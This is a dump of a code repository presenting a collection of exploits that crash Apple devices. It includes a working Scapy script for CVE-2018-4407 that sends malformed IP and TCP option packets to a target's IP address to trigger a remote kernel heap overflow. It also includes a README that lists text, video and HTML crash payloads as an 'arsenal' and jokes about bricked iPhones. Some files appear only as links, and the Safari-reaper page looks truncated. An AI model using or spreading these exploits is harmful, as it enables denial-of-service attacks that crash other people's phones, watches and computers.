├── CVE-2018-4407.py ├── EffectivePower.txt ├── Honey.mp4 ├── README.md ├── Safari-reaper.html ├── Telugu.txt ├── Zalgo.txt └── chaiOS.html /CVE-2018-4407.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from scapy.all import * 3 | from contextlib import contextmanager, redirect_stdout 4 | 5 | @contextmanager 6 | def suppress_stdout(): 7 | with open(os.devnull, "w") as devnull: 8 | with redirect_stdout(devnull): 9 | yield 10 | print("[CVE-2018-4407]: Remote Kernel Heap Overflow") 11 | ip = input("Enter iOS 12 / OS X IP address: ") or 0 12 | if(ip!=0): 13 | print("[*] Sending crafted payload to "+ ip) 14 | for i in range(8,40): 15 | with suppress_stdout(): 16 | send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=62078,options=[(19, "1"*18),(19, "2"*18)])) 17 | send(IP(dst=ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)])) -------------------------------------------------------------------------------- /EffectivePower.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Crash-iOS-Exploit/9e334dde1c747ddfdca02c67cfc916b06fb69b97/EffectivePower.txt -------------------------------------------------------------------------------- /Honey.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Crash-iOS-Exploit/9e334dde1c747ddfdca02c67cfc916b06fb69b97/Honey.mp4 -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Please do not share this link with Apple users

2 |

(Exploit codes can have dramatic effects)

3 | 4 | Here is implementations of exploits that makes every iOS, Apple Watch and macOS versions crash. 5 | 6 | Arsenal 7 | - [EffectivePower](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/EffectivePower.txt) 8 | - [Zalgo](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/Zalgo.txt) 9 | - [Honey](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/Honey.mp4) 10 | - [chaiOS](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/chaiOS.html) 11 | - [Telugu](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/Telugu.txt) 12 | - [SafariReaper](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/Safari-reaper.html) 13 | - [CVE-2018-4407](https://raw.githubusercontent.com/649/Crash-iOS-Exploit/master/CVE-2018-4407.py) 14 | 15 | Not responsible for any bricked iPhones. 16 | -------------------------------------------------------------------------------- /Safari-reaper.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 13 | 14 | 15 |
-------------------------------------------------------------------------------- /Telugu.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Crash-iOS-Exploit/9e334dde1c747ddfdca02c67cfc916b06fb69b97/Telugu.txt -------------------------------------------------------------------------------- /Zalgo.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/649/Crash-iOS-Exploit/9e334dde1c747ddfdca02c67cfc916b06fb69b97/Zalgo.txt --------------------------------------------------------------------------------